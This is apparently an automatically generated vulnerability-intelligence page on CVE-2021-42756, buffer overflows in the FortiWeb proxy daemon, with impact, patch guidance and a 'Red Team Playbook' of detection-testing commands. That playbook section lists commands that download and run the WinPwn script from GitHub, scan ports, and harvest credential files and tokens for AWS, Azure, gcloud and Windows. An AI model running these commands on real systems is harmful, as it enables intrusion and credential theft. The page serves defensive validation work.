CVE-2021-42756
Overview
This vulnerability consists of multiple stack-based buffer overflows arising from improper bounds checking within the proxy daemon component of Fortinet FortiWeb. The flaw occurs when processing specially crafted HTTP requests, leading to memory corruption due to overwriting stack data. Affected versions include FortiWeb 5.x (all versions), and various releases up to 6.4, where the proxy daemon fails to validate input length before copying data onto fixed-size buffers.
Vulnerability Description
Multiple stack-based buffer overflow vulnerabilities [CWE-121] in the proxy daemon of FortiWeb 5.x all versions, 6.0.7 and below, 6.1.2 and below, 6.2.6 and below, 6.3.16 and below, 6.4 all versions may allow an unauthenticated remote attacker to achieve arbitrary code execution via specifically crafted HTTP requests.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code on the affected FortiWeb device, potentially gaining full control over the system. No user interaction or prior authentication is required (CVSS vector AV:N/AC:L/PR:N/UI:N). Successful exploitation may lead to service disruption, data compromise, or lateral movement within the network environment, severely impacting business operations and security posture.
Solution
Fortinet has released patches addressing these buffer overflow vulnerabilities as detailed in their advisory FG-IR-21-186. Users should upgrade FortiWeb to versions later than 6.0.7, 6.1.2, 6.2.6, 6.3.16, or any version beyond 6.4, depending on their current release. Administrators must consult the Fortinet advisory at https://fortiguard.com/psirt/FG-IR-21-186 for exact patch versions and deployment instructions to ensure complete remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the proxy daemon of FortiWeb, a web application firewall, is characterized by multiple stack-based buffer overflow issues. These vulnerabilities arise when the application fails to properly validate the size of incoming data, allowing an attacker to send specially crafted HTTP requests that exceed the allocated buffer size. This overflow can overwrite adjacent memory, leading to unpredictable behavior, including the possibility of executing arbitrary code. The severity of this issue is underscored by its high CVSS score, indicating a critical risk to systems running affected versions of FortiWeb.
Attack vectors for this vulnerability primarily involve unauthenticated remote access. An attacker can exploit the flaw by sending maliciously crafted HTTP requests to the proxy daemon, which processes incoming web traffic. The lack of authentication requirements allows attackers to initiate these requests without needing legitimate credentials, significantly broadening the attack surface. Once the overflow occurs, an attacker can manipulate the execution flow of the application, potentially gaining control over the underlying system. This could lead to unauthorized access to sensitive data, installation of malware, or even complete system compromise.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on FortiWeb for web application security. Successful exploitation can result in data breaches, loss of customer trust, and significant financial repercussions. Businesses may face regulatory penalties if sensitive data is exposed, and the cost of remediation, including incident response and system recovery, can be considerable. Furthermore, the reputational damage associated with such breaches can have long-lasting effects on customer relationships and market position.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating FortiWeb to the latest versions that address these vulnerabilities is crucial. Additionally, employing intrusion detection systems (IDS) can help identify anomalous traffic patterns indicative of exploitation attempts. Network segmentation and strict access controls can further limit exposure to potential attackers. Organizations should also conduct thorough security assessments and penetration testing to uncover any existing vulnerabilities and ensure that their defenses are robust against such threats.
In conclusion, the vulnerabilities present in the FortiWeb proxy daemon represent a critical risk that necessitates immediate attention from affected organizations. By understanding the technical details, potential attack vectors, and real-world implications, businesses can better prepare their defenses. Proactive measures, including timely updates and enhanced monitoring, are essential to mitigate the risks associated with this vulnerability and protect sensitive data from exploitation.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
3ndorph1n/CVE-2021-42756
|
3ndorph1n | 0 | 1 | 2023-02-23 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-42756 |
| fortiguard.com |
GitHub CVE
|
https://fortiguard.com/psirt/FG-IR-21-186 |